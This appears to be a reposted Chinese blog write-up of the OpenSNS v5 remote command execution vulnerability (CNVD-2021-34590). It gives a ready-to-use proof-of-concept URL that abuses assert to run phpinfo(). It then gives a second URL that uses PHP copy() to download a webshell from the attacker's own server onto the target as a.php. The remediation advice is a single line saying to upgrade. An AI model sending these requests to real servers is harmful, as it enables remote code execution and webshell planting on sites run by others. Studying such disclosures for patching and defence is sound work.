Opensns 命令执行漏洞(CNVD-2021-34590)

Opensns 命令执行漏洞(CNVD-2021-34590)

漏洞描述:

OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令

影响版本:

OpenSNS v5

环境搭建:

在线环境 地址

访问首页

Opensns 命令执行漏洞(CNVD-2021-34590)_第1张图片

构造poc 

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

Opensns 命令执行漏洞(CNVD-2021-34590)_第2张图片

看到回显页面phpinfo ,但是此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,所以使用php中的copy函数直接下载webshell实现RCE。

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt(此处为自己公网服务器ip)%27,%27a.php%27)

这里因为没有money,所以没有更深入的获得shell

漏洞修复:

根据官方升级包,进行升级

你可能感兴趣的:(漏洞,OpenSNS,安全)